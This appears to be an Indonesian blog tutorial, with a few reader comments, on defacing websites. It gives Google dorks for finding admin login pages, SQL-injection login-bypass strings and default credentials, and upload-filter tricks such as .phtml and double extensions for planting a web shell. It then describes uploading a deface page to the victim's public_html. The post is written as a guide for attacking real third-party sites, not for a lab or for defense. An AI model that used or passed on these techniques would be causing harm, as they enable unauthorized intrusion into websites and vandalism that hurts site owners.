Cara deface Bypass admin dan bypass ext shell
kali ini saya akan share cara deface methode bypass admin dan bypass ext shell + upload script deface
Bahan Bahan
1. Shell
2. Script Deface
3. Dork
4. kesabaran :v
5. Pc / Android
belum punya shell? boleh kalian download shell mrxbarakuda klik di sini
Script Deface buat sendiri lah masa iya nyolong :v
jika sudah masukin dork jangan lupa dork nya di kembangin biar dapet web yang perawan (vuln),Belum bisa ngembangin Dork? tenang.. udah gua share kemaren tutorial nya klik di sini
Kumpulan Dork Bypass admin
Note : Di kembangin
inurl:/admin-cp/
inurl:/admin-panel/
inurl:/wpanel/ intext:admin
inurl:/admin/ inurl:Login admin
inurl:/admin/index.php
inurl:/admin/home.php
inurl:/admin/dashboard.php
inurl:/admin/ceklogin.php
intext:username intitle:Login
inurl:/home/admin/ intext:admin
inurl:/admin/ intext:2011
inurl:/admin/login.php
inurl:/admin/index.html
inurl:/admin/ intext:Design by
inurl:/admin-login/
inurl:/admin/
Jika sudah dorking langsung aja masuk ke halaman administrator yg bisa di bypass isi username dan password seperti di bawah ini
username : '="or'
password : '="or'
username : admin
password : admin
username : '=' 'or'
password : '=' 'or'
sebenernya masih banyak lagi cara buat bypass tapi biasanya kode di atas banyak vuln :)
Jika sudah dorking silahkan pilih salah satu web yang sudah kalian dorking,kalo sudah masuk admin panel lansung aja eksekusi di sini saya menggunakan '="or'
Langsung saja klik login jika berhasil maka akan otomatis masuk ke dashboard admin seperti gambar di bawah ini
kalo sudah masuk ke dashboard admin kalian cari tempat upload file seperti gambar di bawah ini
Nah di sini saya mem bypass ext php menjadi phtml,kalian juga bisa mem bypass ext kalo seandainya file php tidak bisa di upload,contoh bypass ext: shell.php.jpg shell.jpg.php shell.phtml shell.php5 shell.php.pdf dll,jika shell atau uploader sudah ke upload tinggal kalian cari di mana letak shell kalian berada
nah disini upload gua ke upload di directory /admin/assets/files,beda web beda directory ya :v,kalo sudah kayak gini tinggal klik file phtml yang sudah ke upload untuk membuka shell atau uploader nya
Kalo udah kayak gini ya terserah kalian web nya mau di apain,saran kalo mau nebas index jangan lupa backup bikin web tu susah bukan kayak bikin anak :"v,kalo udah keupload shell nya terus gimana upload script nya,liat gambar di atas kalo kalian sudah selesai upload shell langsung aja klik dir /public_html/ seperti gambar di atas gua udah upload script dengan nama z.php,kalo sudah terupload tinggal bukak aja web nya contoh: http://www.coli.com/z.php
Saya rasa cukup sampai disini tutorial nya semoga mudah di mengerti,kalo bingung silah kan komentar :)
Buat tutor deface media Andro..
BalasHapusPlayer andro
itu udah pakek andro gan
BalasHapusyuhuu, bermanfaat banget gan
BalasHapusTang jepit